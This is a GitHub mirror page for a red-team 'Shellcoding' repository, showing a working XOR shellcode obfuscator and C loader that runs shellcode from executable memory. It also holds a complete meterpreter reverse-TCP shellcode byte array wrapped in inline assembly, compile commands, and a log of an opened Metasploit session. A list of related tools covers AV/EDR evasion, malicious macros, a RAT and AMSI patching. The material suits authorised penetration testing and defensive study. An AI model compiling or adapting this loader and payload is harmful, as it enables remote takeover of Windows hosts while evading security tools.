Mr-Un1k0d3r/Shellcoding Mr-Un1k0d3r/Shellcoding

  • Stars
    star
    209
  • Rank 188,325 (Top 4 %)
  • Language
    C
  • Created over 5 years ago
  • Updated almost 4 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
Mr-Un1k0d3r/Shellcoding
github

Mr-Un1k0d3r

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Shellcoding utilities

Shellcoding

Shellcoding Utilities and shellcode obfuscator generator.

Shellcode generator

Choose a key max size int32. Then generate the shellcode using generator.exe. The final payload is created using generator.py.

> generator.exe 1337 path_to_raw_shellcode_file
Encoded using the following key: 0x00000539 (1337)
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41

Generate the final payload to be compiled.

python3 generator.py 1337 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
#include <windows.h>

int main() {

    DWORD key = 0x539;
    DWORD dwSize = 23;
    DWORD dwProtection = 0;
    CHAR *shellcode = GlobalAlloc(GPTR, dwSize);
    VirtualProtect(shellcode, dwSize, PAGE_EXECUTE_READWRITE, &dwProtection);

    strcpy(shellcode, "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41");

    DWORD *current;
    int i = 0;
    for(i; i < dwSize / 4; i++) {
        current = (DWORD*)shellcode;
        *current = *current ^ key;
        shellcode += 4;
    }
    shellcode -= dwSize;

    asm ("mov %0, %%eax\n\t"
         "push %%eax\n\t"
         "ret"
         :
         : "r" (shellcode));

    // We are probably never going to reach that point
    GlobalFree(shellcode);
    return 0;
}

Finally, compile the output file using GCC and you are good to go.

WARNING

The way that the code is designed will prevent self modifying shellcode to work properly. Since the shellcode is part of the .text section which is by default READ/EXEC shellcode that perform write action will crash. I'm planning on releasing a writable wrapper soon.

Example:

Standard meterpreter shellcode

#include <Windows.h>

int main() {
    asm("call code\n\t"
        ".byte 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0xc0,0xa8,0xc5,0x84,0x68,0x02,0x00,0x1f,0x90,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5\n\t"
        "code:\n\t"
        "ret\n\t");

        return 0;
}

Compile it

mingw32-gcc.exe -c meterpreter.c -o meterpreter.o
mingw32-g++.exe -o meterpreter.exe meterpreter.o

Profit

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 0.0.0.0:8080
[*] Sending stage (179779 bytes) to 192.168.197.1
[*] Meterpreter session 3 opened (192.168.197.132:8080 -> 192.168.197.1:50634) at 2019-05-11 10:54:26 -0400

meterpreter > sysinfo
Computer        : WTL-SP-4XXHWT2
OS              : Windows 10 (Build 17763).
Architecture    : x64
System Language : en_US
Domain          : RingZer0
Logged On Users : 7
Meterpreter     : x86/windows
meterpreter >

loader.c

A simple shellcode loader in C. This shellcode loader is not storing the shellcode in the data section. It store it directly in the text section to new to do shady memory allocation to call your shellcode.

The ASM syntax is for GCC compiler it can be adapted for VC too

raw2hex.py

Convert raw shellcode into something else

raw2hex.py rawshellcodefile -list
0x90, 0x90

raw2hex.py rawshellcodefile
\x90\x90

makefile.py

Generate the final C code

makefile.py shellcode.raw output.c

PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON.c

C code to execute your payload and avoiding any NON MICROSOFT DLLs from been loaded.

Credit

Mr.Un1k0d3r RingZer0 Team

More Repositories

1

EDRs

C
1,857
star
2

PowerLessShell

Run PowerShell command without invoking powershell.exe
Python
1,413
star
3

DKMC

DKMC - Dont kill my cat - Malicious payload evasion tool
Python
1,323
star
4

SCShell

Fileless lateral movement tool that relies on ChangeServiceConfigA to run command
C
1,268
star
5

RedTeamPowershellScripts

Various PowerShell scripts that may be useful during red team exercise
PowerShell
878
star
6

MaliciousMacroGenerator

Malicious Macro Generator
Visual Basic
811
star
7

ThunderShell

Python / C# Unmanaged PowerShell based RAT
Python
770
star
8

RedTeamCSharpScripts

C# Script used for Red Team
C#
706
star
9

RedTeamCCode

Red Team C code repo
C
464
star
10

CatMyPhish

Search for categorized domain
Python
418
star
11

PoisonHandler

lateral movement techniques that can be used during red team exercises
PowerShell
264
star
12

MaliciousClickOnceGenerator

Quick Malicious ClickOnceGenerator for Red Team
C#
234
star
13

ADHuntTool

official repo for the AdHuntTool (part of the old RedTeamCSharpScripts repo)
C#
229
star
14

Windows-SignedBinary

Python
224
star
15

.NetConfigLoader

.net config loader
223
star
16

ATP-PowerShell-Scripts

Microsoft Signed PowerShell scripts
PowerShell
203
star
17

WindowsDllsExport

A list of all the DLLs export in C:\windows\system32\
C
199
star
18

AMSI-ETW-Patch

Patch AMSI and ETW
C#
196
star
19

DLLsForHackers

Dll that can be used for side loading and other attack vector.
Python
175
star
20

MaliciousDLLGenerator

DLL Generator for side loading attack
C
163
star
21

SCT-obfuscator

Cobalt Strike SCT payload obfuscator
Python
142
star
22

RedTeamScripts

Repo with various Red Team scripts
Python
137
star
23

Elevate-System-Trusted-BOF

C
132
star
24

Cookie-Graber-BOF

C or BOF file to extract WebKit master key to decrypt user cookie
C
129
star
25

SPFAbuse

SPF are not as strong as you may think. Red Team tool to send email on behalf of your target corp
Python
128
star
26

RemoteProcessInjection

C# remote process injection utility for Cobalt Strike
C#
80
star
27

Base64-Obfuscator

Simple PowerShell Base64 encoder to avoid detection of your malicious payload
PowerShell
74
star
28

SearchIPOwner

Search public IP owner through ARIN
Python
51
star
29

RedTeamFSharp

Red Team Toolset written in F# (Experimental)
F#
26
star
30

SideChannelAttack

Side Channel script
Python
24
star
31

BOFCode

Bunch of BOF files
C
13
star
32

blog.mr.un1k0d3r.com

Mr.Un1k0d3r.com blog
HTML
9
star
33

MsGraphFunzy

Scripts to interact with Microsoft Graph APIs
Python
5
star